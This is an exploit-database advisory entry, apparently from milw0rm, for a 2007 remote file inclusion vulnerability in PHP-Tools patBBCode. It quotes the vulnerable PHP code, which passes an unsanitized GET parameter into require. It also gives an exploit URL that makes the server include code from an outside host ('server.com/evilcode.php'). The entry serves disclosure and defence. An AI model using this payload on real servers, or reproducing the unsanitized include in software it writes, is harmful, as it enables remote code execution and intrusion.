header-logo
Suggest Exploit
vendor:
patBBCode
by:
milw0rm.com
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: patBBCode
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHP-Tools patBBCode Remote File Inclusion Vulnerability

The vulnerability allows remote attackers to include arbitrary files via a URL in the 'example' parameter.

Mitigation:

Upgrade to a patched version of the software or sanitize user input before including files.
Source

Exploit-DB raw data:

Link to download:
http://www.php-tools.net/site.php?file=patBBCode/overview.xml

Vuln file:
examples\patExampleGen\bbcodeSource.php

Vuln code:
    if( !isset( $_GET['example'] ) )
        die( 'No example selected.' );
   
    $exampleId = $_GET['example'];

    ob_start();

    // make the example think it's still in the right place
    chdir( '../' );
   
    // include the example
    require $exampleId.'.php';
   
    ob_end_clean();

Exploit:
examples\patExampleGen\bbcodeSource.php?example= http://server.com/evilcode.php

# milw0rm.com [2007-11-12]

Navigation

Suggest Exploit

Services By CQR